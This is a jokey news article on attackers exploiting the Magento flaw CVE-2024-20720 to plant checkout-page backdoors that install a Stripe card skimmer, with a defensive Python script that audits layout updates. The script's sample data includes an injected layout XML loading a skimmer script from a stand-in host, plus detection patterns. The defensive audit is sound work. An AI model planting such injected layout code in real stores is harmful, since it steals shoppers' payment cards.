Magento Mayhem: Hackers Exploit Flaw to Plant Stealthy Backdoors in E-Commerce Sites

Who knew that shopping carts could carry more than just your impulse buys? In the world of Magento, they’re apparently also toting around malicious code like it’s the latest fashion accessory. Adobe patches a hole, and the cyber bandits find a new window to shimmy through. It’s like a never-ending game of digital whack-a-mole, but instead of moles, it’s your credit card details at stake!

  • Critical flaw in Magento (CVE-2024-20720) allows for arbitrary code execution.
  • Adobe patched the issue, but attackers are still exploiting it with a sneaky backdoor.
  • The backdoor is executed when customers hit the checkout cart, leading to a Stripe payment skimmer being planted.
  • Financial info is skimmed and sent off to another compromised Magento store.
  • The Russian government has charged six individuals for similar skimmer malware activities dating back to 2017.

Title: Command injection in data collector backup due to insufficient patching of CVE-2023-38208
Cve id: CVE-2024-20720
Cve state: PUBLISHED
Cve assigner short name: adobe
Cve date updated: 02/15/2024
Cve description: Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead to arbitrary code execution by an attacker. Exploitation of this issue does not require user interaction.

The Checkout Checkout

Imagine stepping into the checkout line and instead of a friendly cashier, you're greeted by a digital pickpocket, sneakily slipping a backdoor into your shopping cart. That's essentially what's happening to e-commerce sites running Magento. Thanks to a critical flaw, CVE-2024-20720, the checkout process now comes with an unwanted side of arbitrary code execution. It's like finding a worm in your apple—except the worm is out to steal your wallet.

Adobe's Game of Patch-Catch

Adobe did its due diligence and released a patch faster than you can say "update now," but the cybercriminals are playing at a grandmaster level. Sansec discovered that these digital miscreants have concocted a "cleverly crafted layout template," which is basically a Trojan horse in database form. Every time a customer innocently clicks to view their cart, they're pulling the strings of a hidden puppet master that's busy setting up a Stripe payment skimmer. It's the online equivalent of finding out your shopping cart has been doubling as a getaway car.
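Because the persistence described above lives in the database rather than on disk, a defender's first check is the stored layout updates themselves. The following is an added example, not code from the article or from Sansec: a heuristic audit of rows shaped like Magento 2's `layout_update` table (`layout_update_id`, `handle`, `xml`), flagging entries bound to cart or checkout handles that inject scripts or external URLs through `<action>` calls. The sample rows and the indicator patterns are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Handles that render the cart/checkout pages (assumed set; extend to taste).
CART_HANDLES = {"checkout_cart_index", "checkout_index_index", "default"}
# Heuristic indicators of injected client-side code in layout XML (assumption).
INDICATORS = re.compile(r"<script|https?://|\beval\(", re.IGNORECASE)

def audit_layout_update(handle: str, xml: str) -> list[str]:
    """Return a list of findings for one stored layout update (empty = clean)."""
    findings: list[str] = []
    try:
        root = ET.fromstring(xml)
    except ET.ParseError as exc:
        return [f"unparseable layout XML: {exc}"]
    for el in root.iter():
        tag = el.tag.split("}")[-1]
        # <action method="..."> on a block is how injected markup is set at render time.
        if tag == "action":
            findings.append(f"<action method={el.get('method')!r}> in handle {handle!r}")
        # Inspect element text and attribute values (entities are already decoded here).
        for value in [el.text or ""] + list(el.attrib.values()):
            if INDICATORS.search(value):
                findings.append(f"indicator in <{tag}>: {value.strip()[:60]}")
    if findings and handle in CART_HANDLES:
        findings.append(f"bound to cart/checkout handle {handle!r}: review immediately")
    return findings

def scan_layout_updates(rows: list[tuple[int, str, str]]) -> dict[int, list[str]]:
    """Audit (layout_update_id, handle, xml) rows; return only rows with findings."""
    return {rid: f for rid, h, x in rows if (f := audit_layout_update(h, x))}

# Constructed sample rows: one ordinary promo block, one injected cart script.
BENIGN_XML = (
    '<page xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><body>'
    '<referenceContainer name="content"><block class="Magento\\Framework\\View\\Element\\Template"'
    ' name="promo.banner" template="Magento_Theme::html/banner.phtml"/>'
    "</referenceContainer></body></page>"
)
INJECTED_XML = (
    '<page xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><body>'
    '<referenceBlock name="checkout.cart"><block class="Magento\\Framework\\View\\Element\\Text"'
    ' name="cart.loader"><action method="setText"><argument name="text" xsi:type="string">'
    '&lt;script src="https://skimmer.invalid/stripe.js"&gt;&lt;/script&gt;</argument>'
    "</action></block></referenceBlock></body></page>"
)
SAMPLE_ROWS = [(1, "cms_index_index", BENIGN_XML), (2, "checkout_cart_index", INJECTED_XML)]

if __name__ == "__main__":
    for rid, findings in scan_layout_updates(SAMPLE_ROWS).items():
        print(rid, *findings, sep="\n  ")
```

In a real audit, feed the function the output of `SELECT layout_update_id, handle, xml FROM layout_update` and diff the rows against a known-good export rather than relying on the string indicators alone.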

Skimming the Cream of the Crop

So, what's the big prize for these attackers? Financial information, of course! The Stripe skimmer is like a high-tech pickpocket, deftly lifting credit card details and whisking them away to another compromised Magento storefront. It's a heist that's not just clever, but also alarmingly persistent, sticking around like that one relative who won't leave after the holidays.

Russian Roulette with Skimmers

Meanwhile, over in Russia, the government seems to be dealing with its own cybercriminal all-stars. Six individuals, with names that sound like they could belong to a hacker boy band, have been charged with using skimmer malware since at least 2017. These digital bandits allegedly made off with info from nearly 160,000 payment cards. It's like Ocean's Eleven, but instead of robbing casinos, they're after your digital dough.

The Moral of the Story?

Keep your shopping carts locked and your patches up to date, folks. The digital aisles are rife with more than just tempting sales; they're also crawling with cyber thieves looking to score a jackpot at your expense. It's a wild web out there, and it seems every checkout could potentially add a little more excitement to your shopping spree than you bargained for.